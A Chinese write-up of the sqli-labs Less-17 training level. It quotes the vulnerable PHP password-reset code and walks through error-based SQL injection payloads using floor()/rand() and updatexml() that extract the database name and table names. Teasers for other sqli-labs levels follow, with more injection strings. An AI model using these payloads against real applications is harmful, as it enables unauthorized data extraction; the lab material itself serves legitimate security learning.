2. 程式人生 > >sqli-labs less-17

sqli-labs less-17

阿新 發佈:2018-12-04
concat 4.5 技術 name ati 沒有 count nts code

less-17

uname=admin‘ #&passwd=a
"
")
‘)
都是秘密錯誤


試一下永真

uname=a&passwd=a or 1=1 #

uname=a&passwd=a" or 1=1 #

uname=a&passwd=a) or 1=1 #

uname=a&passwd=a") or 1=1 #

也全部報錯

看一下源碼

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(
 
0);

function check_input($value)
    {
    if(!empty($value))
        {
        // truncation (see comments)
        $value = substr($value,0,15);
        }

        // Stripslashes if magic quotes enabled
        if (get_magic_quotes_gpc())
            {
            $value = stripslashes($value);
            }

        
 
// Quote if not a number
        if (!ctype_digit($value))
            {
            $value = "" . mysql_real_escape_string($value) . "";
            }
        
    else
        {
        $value = intval($value);
        }
    return $value;
    }

// take the variables
if(isset($_POST[uname]) && isset($_POST[
 
passwd]))

{
//making sure uname is not injectable
$uname=check_input($_POST[uname]);  

$passwd=$_POST[passwd];


//logging the connection parameters to a file for analysis.
$fp=fopen(result.txt,a);
fwrite($fp,User Name:.$uname."\n");
fwrite($fp,New Password:.$passwd."\n");
fclose($fp);


// connectivity 
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
    if($row)
    {
          //echo ‘<font color= "#0000ff">‘;    
        $row1 = $row[username];      
        //echo ‘Your Login name:‘. $row1;
        $update="UPDATE users SET password = ‘$passwd‘ WHERE username=‘$row1‘";
        mysql_query($update);
          echo "<br>";
    
    
    
        if (mysql_error())
        {
            echo <font color= "#FFFF00" font size = 3 >;
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo <font color= "#FFFF00" font size = 3 >;
            //echo " You password has been successfully updated " ;        
            echo "<br>";
            echo "</font>";
        }
    
        echo <img src="../images/flag1.jpg"   />;    
        //echo ‘Your Password:‘ .$row[‘password‘];
          echo "</font>";
    


      }
    else  
    {
        echo <font size="4.5" color="#FFFF00">;
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo <img src="../images/slap1.jpg"   />;
    
        echo "</font>";  
    }
}

使用了get_magic_quotes_gpc

name和password分開驗證

技術分享圖片

做過頭了 ,這個是秘密重置

技術分享圖片

我們先看一些check_input()這個函數的內容

對傳入的uname進行了限制 ,只能16個字符

調用了get_magic_quotes_gpc() 將 ‘ " 空格 / 進行了轉義

這裏沒有對passwd進行任何處理

這裏可以用floor()報錯註入

uname=admin&passwd=1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) #

技術分享圖片

還可以用updatexml()進行報錯

1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) #

技術分享圖片

爆表

uname=admin&passwd=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=security),0x7e),1) #

技術分享圖片

sqli-labs less-17

相關推薦

sqli-labs less-17

concat 4.5 技術 name ati 沒有 count nts code less-17 uname=admin‘ #&passwd=a"")‘)都是秘密錯誤 試一下永真 uname=a&passwd=a‘ or 1=1 # uname=a&

sqli-labs (less-8-less-10)

pos clas src 127.0.0.1 使用 mage lee 小菜 ascii 盲註需要掌握一些MySQL的相關函數:length(str):返回str字符串的長度。substr(str, pos, len):將str從pos位置開始截取len長度的字符進行返回

sqli-labs(less-11-16)

POST登入 首先試試 uname=admin'# & passwd=1 登入成功 如果不知道使用者名稱 ,註釋符被過濾,可以從password入手 一般第一個登陸欄位(一般是使用者名稱)就用註釋,第二個登陸欄位(一般就密碼)用閉合和註釋都是可以的 uname=test

sqli-labs—————Less-1(字元型注入)

前言從這一篇文章開始,我們將開始真正的講解Sqli-libs中的各種注入,從第1階層開始,後續的內容會陸續放出,歡迎各位大佬的關注與評論!Less-1首先,開啟主頁進入第一關:可以看到提示,提示我們要傳入一個引數,名為ID,而且是資料型別,那麼我就傳入該引數看看到這裡,我們可

sqli-labs————less 23(高階注入篇)

前言從這一關開始,我們進進入了短暫的高階注入部分,這一部分中將會陸續介紹一些更為巧妙的注入技巧。Less -23檢視一下原始碼:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://

sqli-labs less 1 (基於錯誤的GET單引號字元型注入)

基礎知識: 常用url編碼:空格%20,單引號%27,雙引號%22,#號%23 mysql常用註釋符:#...  ,--空格...  ,/*...*/,--+(某些情況+可以代替空格,+瀏覽器會編碼成空格) 常用工具:火狐的hackbar concat函式:連線一個或

sqli-labs ————less -9

Less-9首先我們可以檢視一下原始碼:一方面:從標題中我們可以看到這是一個基於時間盲注的單引號注入另一方面:從之後的“print_r(mysql_error());”來看我們並不可以使用報錯注入最後,我們可以看到可以通過' and 1=1 --+或者' or 1=1 --+

sqli-labs17,增刪改

增刪改 bubuko mage HERE 刪除表 column del nbsp 列名 增 insert into users values(‘16‘,‘lcamry‘,‘lcamry‘); 刪 delete from users where id=16

sqli-labs修煉の道 less-11

正常 字段名 註入 用戶 atm pre .cn bat per 首先判斷字段數目 Payload語句: admin‘ order by 2—s    正常顯示故字段數目大於等於2 Payload語句: admin‘ order by 3—s

Sqli labs系列-less-1 詳細篇

失敗 環境 活躍 link 攻擊 master dbd href and 要說 SQL 註入學習,網上眾多的靶場,就屬 Sqli labs 這個系列挺不錯的,關卡達到60多關了,我自己也就打了不幾關,一個挺不錯的練習SQL註入的源碼。 我一開始就準備等我一些原理篇總結完了,

Sqli labs系列-less-2 詳細篇

clas deb 技術分享 說了 構造 2-0 content 選擇 讓其 就今天晚上一個小插曲,瞬間感覺我被嘲諷了。 SQL手工註入這個東西,雜說了吧,如果你好久不玩的話,一時說開了,你也只能講個大概,有時候,長期不寫寫,你的構造語句還非常容易忘,要不我雜會被瞬間嘲諷了啊

sqli-labs學習(less-5-less-7)

先介紹一些函式   count(*) 返回在給定的選擇中被選的行數,即結果的數目     報錯了,但是union沒有出結果?,只是為什麼? 原來是這樣,這樣的話只能用報錯注入了 (1). 通過floor報錯 and (select 1 fro

sqli-labs】Less7

pri select 輸出 labs 導出文件 secure 文件的 pst ble Less-7: 輸出文件 sql導出文件語句 select * from table_test into outfile ‘test.txt‘ 既然名字是輸出文件,那肯定是和文件有關系

【20171101早】sqli-libs Less 23-28

try ext cat sql 其他 baidu https 查看 con Less 23:   題目:   分析:payload:http://192.168.162.135/sqli-libs/Less-23/?id=-1‘ union select

SQLi-LABS Page-3(Basic Challenges)

htm from lean bool pan -- info blog lec sqlmap: python sqlmap.py -u "http://mysqli/Less-3/?id=1" ---Parameter: id (GET) Type: bo

sqli-labs-master第一關:基於錯誤的GET單引號字符型註入

where php版本 網站 value ali pass 看到了 php代碼 賬號 首先來到第一關:http://127.0.0.1/sqli-labs-master/Less-1/ 用語句 http://127.0.0.1/sqli-labs-master/Less-1

sqli-labs】 less2 GET - Error based - Intiger based (基於錯誤的GET整型註入)

format ima gpo ase rom pos mit 參數 png 與less1相同,直接走流程 提交參數,直接order by http://localhost/sqli/Less-2/?id=1 order by 1%23 http://localhos

sqli-labs-master第六關

log ces 51cto proc href ast http 鏈接 -o 文本文檔可以下載: 鏈接:https://pan.baidu.com/s/1o9c0Hyq 密碼:md9wsqli-labs-master第六關

sqli-labs】 less10 GET - Blind - Time based. - Double quotes (基於時間的雙引號盲註)

localhost mage http labs substr blog com 刷新 單引號 這個和less9一樣,單引號改完雙引號就行了 http://localhost/sqli/Less-10/?id=1" and sleep(5)%23 5s後頁面完成刷新

sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基於時間的GET單引號盲註)

mage 一個 sub inf .com info pre log () 加and http://localhost/sqli/Less-9/?id=1‘ and ‘1‘=‘1%23 http://localhost/sqli/Less-9/?id=1‘ and ‘1‘